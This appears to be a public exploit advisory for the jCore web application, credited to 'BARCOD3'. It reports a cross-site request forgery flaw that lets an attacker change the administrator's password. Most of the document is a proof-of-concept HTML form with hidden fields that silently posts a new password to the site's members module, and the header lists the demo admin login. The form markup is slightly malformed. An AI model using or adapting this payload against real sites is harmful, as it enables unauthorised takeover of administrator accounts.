< ------------------- header data start ------------------- >


#############################################################

# Application Name : jCore

# Vulnerable Type : XSRF

# Infection : Admin password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://demo.jcore.net/admin

Admin ; Demo
password ; Demo

# Home : ozkanbozkurt.com

#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >
<h3>BARCOD3</h3>
<form action=’http://demo.jcore.net/modules/members?’ method=’post’ enctype=’multipart/form-data’ >
<input type=’hidden’ name=’username’ id=’entryusername’ class=’text-entry’ value=’username’ />
<input type=’hidden’ name=’Email’ id=’entryEmail’ class=’text-entry’ value=’[email protected]’ />
<input type=’hidden’ name=’Website’ id=’entryWebsite’ class=’text-entry’ value=’’OZKANBOZKURT.COM >
<input type=’checkbox’ name=’StayLoggedIn’ id=’entryStayLoggedIn’ class=’checkbox-entry’ value=’1’ /
<input type=’checkbox’ name=’DisableNotificationEmails’ id=’entryDisableNotificationEmails’

class=’checkbox-entry’ value=’1’ />
<input type=’hidden’ name=’password’ id=’entrypassword’ class=’text-entry’ value=’passWORD’ />
<input type=’hidden’ name=’Repassword’ id=’entryRepassword’ class=’text-entry’ value=’passWORD’ />
<input type=’submit’ name=’memberaccountsubmit’ id=’buttonmemberaccountsubmit’ class=’button

button-memberaccountsubmit’ value=’Submit’ />
</form>
< -- bug code end of -- >